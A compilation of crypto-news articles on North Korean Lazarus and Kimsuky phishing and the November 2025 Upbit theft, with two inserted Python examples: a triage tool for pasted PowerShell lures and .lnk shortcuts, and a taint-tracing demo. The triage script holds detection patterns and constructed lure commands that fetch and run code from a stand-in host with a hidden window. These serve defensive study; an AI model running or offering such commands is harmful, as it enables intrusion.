
Lazarus Group Tops Global Hack Mentions As Spear Phishing Attacks Surge

According to a report from South Korean security firm AhnLab, state-linked hacking organizations like the North Korea-backed Lazarus Group relied heavily on spear phishing to steal funds and gather intelligence over the last 12 months. The group often posed as conference organizers, job contacts or colleagues to trick people into opening files or running commands.

Lazarus Group: Spear Phishing Turns More Realistic With AI Lures

Reports have disclosed that Kimsuky, another North Korea-linked group, used artificial intelligence to forge military ID images and packaged them inside a ZIP attachment to make its messages look legitimate.

Security researchers say the fake IDs were convincing enough that recipients opened the attachments, which then ran hidden code. The incident has been traced to mid-July 2025 and appears to mark a step up in how attackers craft their lures.

The aim is simple. Get a user to trust a message and open a file, and the attacker gets a way in. That access can lead to stolen credentials, planted malware or drained crypto wallets. The groups linked to Pyongyang have been tied to attacks on finance and defense targets, among others.

Lazarus Group Victims Asked To Execute Commands

Some campaigns did not rely only on hidden exploits. In several cases, targets were tricked into typing PowerShell commands themselves, sometimes while believing they were following official instructions.

That step gives the attacker code execution in the victim's own session, with whatever privileges that user already holds, without needing an exploit or a zero-day. Security outlets have warned that this social trick is spreading and can be hard to spot.

Lazarus Group: Old File Types, New Tricks

Attackers also abused Windows shortcut (.lnk) files and similar formats: a shortcut can point at a legitimate program such as PowerShell and pass it a long argument string that the user never sees but that runs as soon as the file is opened. Researchers have documented nearly 1,000 malicious .lnk samples tied to broader campaigns, showing that familiar file types remain a favorite delivery method. Those hidden arguments can in turn pull down further payloads.
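The two lure types above, a command the victim is talked into pasting and a shortcut carrying hidden arguments, can be triaged with the same indicators. The script below is an added example and not code from the article or from AhnLab: it scores a command line for the flags these lures rely on, then builds and parses a minimal Shell Link (.lnk) file to pull the arguments and window setting out of the binary format. The command strings and the shortcut are constructed test data; `example.invalid` is a reserved, non-resolving domain, and the indicator list is a starting heuristic, not a complete detection.

```python
"""Triage for pasted (ClickFix-style) commands and .lnk shortcuts carrying
hidden arguments. Added example using only the standard library; sample
inputs are constructed, not real campaign artifacts."""
import re
import struct

# Indicators that rarely appear in a command an ordinary user is asked to run
# but routinely appear in lures that fetch and execute a second stage.
SUSPICIOUS_PATTERNS = [
    (r"-e(c|nc|ncodedcommand)?\s", "encoded command"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-nop\b|-noprofile", "profile bypass"),
    (r"-ep\s+bypass|executionpolicy\s+bypass", "execution policy bypass"),
    (r"\biex\b|invoke-expression", "invoke-expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|mshta|certutil", "remote fetch"),
    (r"frombase64string", "base64 decode"),
]


def score_command(cmd: str) -> list[str]:
    """Return the reasons a pasted or shortcut command line looks like a lure."""
    low = cmd.lower()
    reasons = [label for pat, label in SUSPICIOUS_PATTERNS if re.search(pat, low)]
    # Long runs of whitespace push the real command past what the shortcut
    # Properties dialog displays, so only a harmless-looking prefix is visible.
    if re.search(r"\s{20,}", cmd):
        reasons.append("whitespace padding")
    return reasons


# Shell Link (.lnk) constants from the MS-SHLLINK format.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the launched window out of sight
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Construct a minimal Unicode .lnk (test fixture, not a real sample)."""
    flags = HAS_RELPATH | HAS_ARGS | IS_UNICODE
    # 76-byte header: size, CLSID, flags, attributes, 3 timestamps, file size,
    # icon index, ShowCommand, hotkey, reserved fields.
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:  # CountCharacters + UTF-16LE chars, no terminator
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


def parse_lnk(data: bytes) -> dict:
    """Walk header, optional IDList/LinkInfo, then the StringData fields in order."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_IDLIST:      # IDListSize (2 bytes) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:    # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    for flag, name in STRING_FIELDS:
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * (2 if unicode else 1)
            info[name] = data[pos:pos + nbytes].decode("utf-16-le" if unicode else "cp1252")
            pos += nbytes
    return info


def triage_lnk(data: bytes) -> list[str]:
    """Combine command-line indicators with shortcut-specific ones."""
    info = parse_lnk(data)
    reasons = score_command(info.get("arguments", ""))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window minimised on launch")
    target = info.get("relative_path", "").lower()
    if target.endswith(("powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe")):
        reasons.append("script host target")
    return reasons


# Constructed samples (hypothetical; example.invalid never resolves).
CLICKFIX_SAMPLE = ('powershell -w hidden -nop -ep bypass -c '
                   '"iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/x\')"')
BENIGN_SAMPLE = 'powershell -Command "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"'
LNK_SAMPLE = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    " " * 300 + '-w hidden -ep bypass -c "iex (iwr http://example.invalid/p)"',
    show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    print("pasted lure :", score_command(CLICKFIX_SAMPLE))
    print("benign      :", score_command(BENIGN_SAMPLE))
    print("shortcut    :", triage_lnk(LNK_SAMPLE))
```

The parser only handles the fields the triage needs; it skips the IDList and LinkInfo blocks by their declared sizes rather than decoding them, which is enough to reach the argument string that the Windows Properties dialog truncates. Real samples should additionally be run through a full LNK parser and the downloaded second stage examined in isolation.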

Why This Matters Now

Taken together, tailored messages, AI-forged visuals and requests that the user run code themselves make these attacks harder to stop. Multi-factor authentication and software patches help, but training people to treat unusual requests with suspicion remains key. Security teams advocate basic safety nets: update, verify, and when in doubt, check with a known contact through a separate channel.

According to reports, Lazarus Group and Kimsuky continue to be active. Lazarus, based on AhnLab’s findings, received the most mentions in post-incident analyses over the last 12 months. Lazarus has been singled out for financially motivated hacks, while Kimsuky appears more focused on intelligence gathering and tailored deception.

Featured image from Anadolu, chart from TradingView

Upbit $30 Million Hack Update: Authorities Link Breach To North Korean Hackers

South Korea’s largest cryptocurrency exchange, Upbit, is currently under scrutiny by regulators following a significant hack that led to the unauthorized withdrawal of approximately $36.9 million in assets on the Solana (SOL) network. The breach impacted over 20 different tokens and has prompted Upbit to freeze assets on its platform while an investigation unfolds.

Lazarus Group Tied To Upbit Hack

Authorities are now investigating the possibility of North Korean involvement in the attack. Reports suggest that the Lazarus Group, a unit linked to North Korea’s intelligence service, may have orchestrated the hack, which Upbit has described as an “abnormal withdrawal.”

This group has been consistently linked to several high-profile crypto heists in recent years, and the US Federal Bureau of Investigation (FBI) has identified North Korean cyber operations as one of the most sophisticated and persistent threats.

The attack came almost exactly six years after a previous major breach, in which Upbit lost 342,000 Ethereum (ETH) to North Korean hackers.

According to an unnamed government official, this latest hack bears similarities to a 2019 incident in which approximately 58 billion won in cryptocurrencies was stolen, also attributed to the Lazarus Group.

In response to the attack, the South Korean National Police Agency has launched an investigation into the matter, although officials have not provided further comments on the case. Upbit’s operator, Dunamu, confirmed that an in-depth investigation into the cause and extent of the asset outflow is currently underway.

Crypto Exchange Moves Funds To Cold Storage

The cryptocurrency exchange’s CEO Oh Kyung-seok stated that as soon as abnormal withdrawal activity was detected, Upbit promptly suspended all deposit and withdrawal services. 

“We are conducting a comprehensive inspection, prioritizing the protection of member assets,” he said in a notice to users. Following the discovery of the unauthorized transactions, Upbit has taken steps to freeze the affected funds wherever possible.

To prevent any further unauthorized transfers, the exchange has shifted all remaining assets to cold storage, ensuring “a secure environment for funds.” 

Upbit is also said to be working with relevant project teams to freeze assets on-chain, having already blocked a portion of the stolen funds related to the cryptocurrency Solayer (LAYER). The exchange has indicated that deposits and withdrawals will only resume once full security checks are completed.

Dunamu has vowed to reimburse customers for any losses with business funds as part of its commitment to its users. It remains to be seen what additional information the country’s authorities will release in the coming days, as well as potential refund deadlines for affected individuals.  


Featured image from DALL-E, chart from TradingView.com 

Upbit’s $32 Million Mystery Theft Points Toward Lazarus Group

Upbit, South Korea’s biggest cryptocurrency exchange, said it found unusual withdrawals from one of its Solana hot wallets and moved quickly to halt deposits and withdrawals and protect customers.

According to company statements and law enforcement sources, about 44.5 billion Korean won — roughly $32 million — vanished in the incident that surfaced late November 2025. Upbit paused deposits and withdrawals and said it would repay affected users from its own reserves.

Suspected North Korean Ties

Based on reports from investigators and industry watchers, authorities are examining links to the Lazarus Group, a cyber unit long tied to North Korea.

Security teams point to methods similar to earlier attacks attributed to the same group, including a major breach in 2019 that took 342,000 ETH from the exchange.

Officials say the pattern of rapid withdrawals, quick cross-chain transfers, and spreading funds across many wallets matches tactics used in past nation-linked operations.

today south korea blamed north korea for the upbit hack nice headline but that part came later

so what actually happened?

an unknown attacker drained a few of upbit’s hot wallets waited a bit then started moving funds across chains

at some point the hacker bridged usdc from… pic.twitter.com/swq8yjIOLR

— trix (@trixwtb) November 28, 2025

How The Funds Were Moved

Reports have disclosed that the stolen tokens were moved off Solana, converted through several bridges, and routed through multiple chains to make tracking harder.

Transfers happened fast and in many small transactions, which complicates tracing attempts on the blockchain. Blockchain analysts are combing transaction histories, but the bridge conversions and mixing steps slow down any straightforward recovery efforts.
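The tracing work the article says is slowed by splits and bridge hops is, at its core, a taint calculation over the transfer graph. The script below is an added example, not code from the article or from the investigators: it applies haircut (proportional) taint tracing to a constructed ledger with hypothetical addresses, follows a bridge by an analyst-supplied pairing of its inbound and outbound addresses, and stops at labelled custodial endpoints (exchange deposit addresses, a mixer). Real investigations run over chain data with address clustering and exchange attributions that this example does not include.

```python
"""Haircut (proportional) taint tracing over a transfer ledger. Added
example; the ledger is constructed and every address is hypothetical."""
from collections import defaultdict

# (source, destination, amount, time). A bridge appears as an inbound address
# on one chain paired with an outbound address on the other; the pairing is
# something an analyst establishes from bridge logs, not plain on-chain data.
TRANSFERS = [
    ("upbit_hot_1", "thief_a", 10_000.0, 1),     # the theft itself
    ("clean_user", "exchange_dep_1", 500.0, 1),  # unrelated deposit, same address later hit
    ("thief_a", "hop_1", 6_000.0, 2),
    ("thief_a", "hop_2", 4_000.0, 2),
    ("hop_1", "bridge_x_in", 6_000.0, 3),        # leaves the chain through a bridge
    ("hop_2", "exchange_dep_1", 1_000.0, 3),
    ("hop_2", "hop_3", 3_000.0, 3),
    ("clean_user_2", "hop_3", 1_000.0, 3),       # clean funds mixed into a hop wallet
    ("hop_3", "exchange_dep_2", 4_000.0, 4),     # 75% tainted after the haircut
    ("bridge_x_out", "mixer_m", 5_990.0, 5),     # arrives on the other chain, minus fee
]
LABELS = {"exchange_dep_1": "exchange", "exchange_dep_2": "exchange", "mixer_m": "mixer"}
BRIDGE_LINKS = {"bridge_x_in": "bridge_x_out"}


def trace(transfers, victim, labels, bridge_links):
    """Return (tainted amount per endpoint label, min hops from the victim per
    address, residual taint parked at unlabelled addresses)."""
    balance, taint = defaultdict(float), defaultdict(float)
    hops = {victim: 0}
    reached = defaultdict(float)
    for src, dst, amount, _ in sorted(transfers, key=lambda t: t[3]):
        if src == victim:
            share = amount                      # outflow from the victim is fully tainted
        elif balance[src] > 0:
            share = amount * taint[src] / balance[src]   # haircut: diluted by clean funds
            balance[src] -= amount
            taint[src] -= share
        else:
            share = 0.0                         # sender never held tainted funds
        dst = bridge_links.get(dst, dst)        # follow the bridge pairing across chains
        balance[dst] += amount
        taint[dst] += share
        if share > 0:
            hops[dst] = min(hops.get(dst, float("inf")), hops[src] + 1)
        if dst in labels:
            reached[labels[dst]] += share       # custodial endpoint: tracing stops here
    residual = {a: t for a, t in taint.items() if a not in labels and t > 1e-9}
    return dict(reached), hops, residual


if __name__ == "__main__":
    reached, hops, residual = trace(TRANSFERS, "upbit_hot_1", LABELS, BRIDGE_LINKS)
    for label, amount in reached.items():
        print(f"{label:10s} received {amount:,.0f} tainted")
    for addr in sorted(hops, key=hops.get):
        print(f"  {addr:15s} {hops[addr]} hop(s) from victim")
    print("residual taint not at a labelled endpoint:", residual)
```

The haircut rule is one of several taint conventions (FIFO and poison are the others commonly used); it is the one that makes the dilution at `hop_3` visible, where 1,000 units of clean funds cut the tainted share of the next outflow to 75%. The residual at `bridge_x_out` is the bridge fee that never reached the mixer.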

On-Site Checks And Ongoing Forensics

Authorities have launched inspections at Upbit’s systems and are reviewing logs, admin access records, and wallet backups.

According to sources close to the probe, investigators suspect an admin credential compromise or impersonation rather than a simple software flaw in Upbit’s servers.

While evidence is still being gathered, forensic teams are looking for the entry point used to sign the withdrawal transactions and any indicators of outside control.

Investigation And Market Impact

The timing of the theft drew attention because it coincided with corporate news: Upbit’s parent, Dunamu, had just publicly announced a merger with Naver valued at about $10.3 billion.

Market players noted the coincidence, and some suggested the attack could aim to distract or unsettle stakeholders. For investors, exchanges, and regulators, the incident renews calls for stricter custody controls, better separation of hot and cold wallets, and clearer rules for large crypto platforms.

Yonhap News reports that South Korea’s largest crypto exchange, Upbit, suffered a hack worth about 44.5 billion KRW ($32 million). Authorities are investigating whether North Korea’s Lazarus Group was behind the attack. The group was also linked to Upbit’s 2019 theft of 58…

— Wu Blockchain (@WuBlockchain) November 28, 2025

Upbit has pledged full reimbursement to users hit by the theft and says it will share findings when the probe allows. Based on reports, tracing and recovery work is ongoing but will be slow because of how the assets were fragmented and moved across chains.

Watchers say confirmation of Lazarus involvement would mark another example of how state-linked actors continue to target major crypto firms.

Authorities have not yet publicly released a definitive attribution. The next steps to watch include any formal statements from prosecutors, whether any of the moved funds are frozen or returned, and how regulators will respond to reduce the chance of similar losses.

Featured image from Advance Innovations, chart from TradingView

$32 Million Crypto Heist: North Korea’s Lazarus Suspected In Upbit Breach

South Korea’s largest cryptocurrency exchange, Upbit, is facing a second major security crisis after 44.5 billion won (around $30–32 million) in digital assets were drained from a hot wallet, with authorities “strongly” suspecting North Korea’s Lazarus Group.

According to ICT industry sources and government officials cited by Yonhap News on November 28, investigators are focusing on Lazarus, a hacking unit under North Korea’s Reconnaissance General Bureau, as the likely perpetrator. The group was also suspected in Upbit’s 2019 breach, when approximately 58 billion won in Ethereum was stolen.

North Korean Crypto Hackers Strike Again

The latest incident again centers on a hot wallet — an internet-connected operational wallet — replicating the core vulnerability of 2019. A government official quoted by Yonhap said the attack likely did not involve a deep server exploit but instead an administrative compromise: “Rather than a server attack, it’s possible they compromised an administrator account or impersonated an administrator to transfer funds,” adding that because the earlier hack used this method, “we consider this approach the most likely.”

Security experts point to the post-hack on-chain behavior as key circumstantial evidence. After the theft, the funds were rapidly “hopped” through other exchange wallets and then subjected to “mixing,” a laundering technique designed to break traceability.

One expert noted that “funds were hopped to other exchange wallets before mixing occurred. This can be seen as the modus operandi of the Lazarus Group,” adding that “once mixing occurs, transactions become untraceable.” Because FATF member countries cannot legally operate mixing services, the expert argued it is “highly likely North Korea was responsible.”

The timing has raised additional suspicion. The hack occurred on November 27, the same day Naver and Upbit operator Dunamu held a high-profile joint press conference at Naver’s “1784” headquarters to present their group-integration and AI/Web3 expansion strategy.

A security expert suggested the date may have been intentionally chosen: “Hackers often have a strong desire to show off. It’s possible they chose the 27th as the hacking date to flaunt their timing, selecting the very day of the merger announcement.” The attack also lands almost exactly six years after Upbit’s 2019 hack, which occurred on November 27.

Regulatory and supervisory bodies have moved quickly. Following a December interpretation by the Financial Services Commission that virtual asset exchanges’ user transaction data falls under the Credit Information Act, the Financial Supervisory Service and the Korea Financial Security Institute have launched an on-site inspection of Upbit. The Korea Internet & Security Agency has joined to provide technical support.

At press time, the total crypto market cap stood at $3.07 trillion.

Total crypto market cap

North Korea’s Lazarus Group Linked to $30M Hack at South Korean Exchange Upbit

By: Amin Ayan

North Korea’s notorious cybercrime unit, Lazarus Group, is suspected of orchestrating a major cryptocurrency breach that drained roughly $30.6 million from South Korea’s largest exchange, Upbit.

Key Takeaways:

  • North Korea’s Lazarus Group is suspected of stealing about $30.6 million from Upbit.
  • Upbit operator Dunamu said it will fully reimburse users and has halted transactions.
  • Officials say the stolen funds were rapidly laundered through multiple wallets, a tactic Lazarus has used in the past.

Authorities are preparing to conduct an on-site inspection at the exchange, following signs that the attack may be tied to the same actors behind previous intrusions attributed to Lazarus, Yonhap News reported, citing government and industry sources.

The group has previously been linked to crypto thefts aimed at generating revenue for Pyongyang amid persistent foreign currency shortages.

Dunamu to Reimburse Users After $30M Solana-Linked Hack at Upbit

Upbit’s operator, Dunamu, confirmed that Solana-linked assets worth 44.5 billion won were transferred to an unauthorized wallet on Thursday.

The company said it will reimburse users in full using its own reserves and moved quickly to halt withdrawals and deposits as internal checks were launched.

Investigators said the techniques used in the breach closely resembled the 2019 incident in which attackers allegedly stole 58 billion won in Ethereum from the same platform.

Officials believe this time the hackers may have bypassed core infrastructure by impersonating administrators or compromising internal accounts to authorize the withdrawal.

Security officials said the funds were swiftly moved through wallets associated with other platforms, indicating an attempt to obscure transaction trails through laundering tactics that Lazarus has used in past operations.

“It is their standard approach to scatter tokens across multiple networks to break tracking,” one official said.


Analysts noted that Lazarus has repeatedly targeted high-profile crypto platforms to maximize impact and exposure, suggesting the attack may have been deliberately staged to exploit heightened public attention.

Earlier this month, South Korea said it may reconsider its sanctions approach toward North Korea after new US measures connected Pyongyang’s crypto theft operations to the funding of its weapons programs.

Second Vice Foreign Minister Kim Ji-na said Seoul could “review sanctions as a measure if they are really needed,” stressing close coordination with Washington to counter North Korea’s growing cyber and digital threats.

“In cases of cryptocurrency theft by Pyongyang, coordination between South Korea and the US is important, as it can be used to fund North Korea’s nuclear and missile programs and pose a threat to our digital ecosystem,” Kim stated.

Naver Announces Plan to Acquire Dunamu

The breach came a day after Naver announced a plan to acquire Dunamu via a share-swap deal through its finance arm, putting the exchange in the national spotlight.

Meanwhile, Naver Financial, the fintech arm of South Korean internet giant Naver, is preparing to roll out a stablecoin wallet in Busan as part of the city’s ongoing push to build a blockchain-powered local economy.

Naver has reportedly finished development of the wallet, which is now undergoing final checks before its scheduled launch next month.

The project is being built in partnership with venture capital firm Hashed and the Busan Digital Asset Exchange (BDAN), the entity behind Busan’s broader digital asset strategy.

The post North Korea’s Lazarus Group Linked to $30M Hack at South Korean Exchange Upbit appeared first on Cryptonews.
